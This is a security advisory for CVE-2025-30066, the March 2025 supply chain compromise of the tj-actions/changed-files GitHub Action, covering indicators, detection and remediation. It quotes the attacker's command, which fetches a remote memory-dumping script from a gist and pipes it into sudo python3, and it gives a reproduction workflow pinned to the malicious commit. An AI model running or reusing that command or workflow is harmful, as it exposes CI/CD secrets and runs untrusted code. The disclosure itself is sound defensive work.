CVE-2025-30066

### Summary A supply chain attack compromised the **tj-actions/changed-files** GitHub Action, impacting over 23,000 repositories. Attackers retroactively modified multiple version tags to reference a malicious commit, exposing CI/CD secrets in workflow logs. The vulnerability existed between **March 14 and March 15, 2025**, and has since been mitigated. This poses a significant risk of unauthorized access to sensitive information. This has been patched in [v46.0.1](https://github.com/tj-actions/changed-files/releases/tag/v46.0.1). ### Details The attack involved modifying the **tj-actions/changed-files** GitHub Action to execute a malicious Python script. This script extracted secrets from the Runner Worker process memory and printed them in GitHub Actions logs, making them publicly accessible in repositories with public workflow logs. #### Key Indicators of Compromise (IoC): - **Malicious commit**: [0e58ed8671d6b60d0890c21b07f8835ace038e67](https://github.com/tj-actions/changed-files/commit/0e58ed8671d6b60d0890c21b07f8835ace038e67) - **Retroactively updated tags pointing to the malicious commit**: - `v1.0.0`: 0e58ed8671d6b60d0890c21b07f8835ace038e67 - `v35.7.7-sec`: 0e58ed8671d6b60d0890c21b07f8835ace038e67 - `v44.5.1`: 0e58ed8671d6b60d0890c21b07f8835ace038e67 #### Malicious Code Execution: The malicious script downloaded and executed a Python script that scanned memory for secrets, base64-encoded them, and logged them in the build logs: ``` B64_BLOB=`curl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3` ``` This script targeted the **Runner Worker process**, extracting and exfiltrating its memory contents. ### Proof of Concept (PoC) #### Steps to Reproduce: 1. Create a GitHub Actions workflow using the **tj-actions/changed-files** action: ```yml name: "tj-action changed-files incident" on: pull_request: branches: - main jobs: changed_files: runs-on: ubuntu-latest steps: - name: Get changed files id: changed-files uses: tj-actions/changed-files@0e58ed8671d6b60d0890c21b07f8835ace038e67 ``` 2. Run the workflow and inspect the logs in the Actions tab. 3. Vulnerable workflows may display secrets in the logs. #### Detection: Analyze network traffic using [Harden-Runner](https://github.com/step-security/harden-runner), which detects unauthorized outbound requests to: - `gist.githubusercontent.com` Live reproduction logs: 🔗 [Harden-Runner Insights](https://app.stepsecurity.io/github/step-security/github-actions-goat/actions/runs/13866127357) This attack was detected by **StepSecurity** when anomaly detection flagged an unauthorized outbound network call to `gist.githubusercontent.com`. ### Duration of Vulnerability The vulnerability was active between **March 14 and March 15, 2025**. ### Action Required 1. **Review your workflows executed between March 14 and March 15**: - Check the **changed-files** section for unexpected output. - Decode suspicious output using the following command: ``` echo 'xxx' | base64 -d | base64 -d ``` - If the output contains sensitive information (e.g., tokens or secrets), revoke and rotate those secrets immediately. 2. **Update workflows referencing the compromised commit**: - If your workflows reference the malicious commit directly by its SHA, update them immediately to avoid using the compromised version. 3. **Tagged versions**: - If you are using tagged versions (e.g., `v35`, `v44.5.1`), no action is required as these tags have been updated and are now safe to use. 4. **Rotate potentially exposed secrets**: - As a precaution, rotate any secrets that may have been exposed during this timeframe to ensure the continued security of your workflows. ### Impact - **Type of vulnerability**: Supply chain attack, Secrets exposure, Information leakage - **Who is impacted**: - Over 23,000 repositories using **tj-actions/changed-files**. - Organizations with public repositories are at the highest risk, as their logs may already be compromised. - **Potential consequences**: - Theft of CI/CD secrets (API keys, cloud credentials, SSH keys). - Unauthorized access to source code, infrastructure, and production environments. - Credential leaks in public repositories, enabling further supply chain attacks.

Los archivos modificados de tj-actions anteriores a la versión 46 permiten a atacantes remotos descubrir secretos leyendo los registros de acciones. (Las etiquetas v1 a v45.0.7 se vieron afectadas el 14 y el 15 de marzo de 2025 porque fueron modificadas por un actor de amenazas para apuntar a el commit 0e58ed8, que contenía código malicioso de updateFeatures).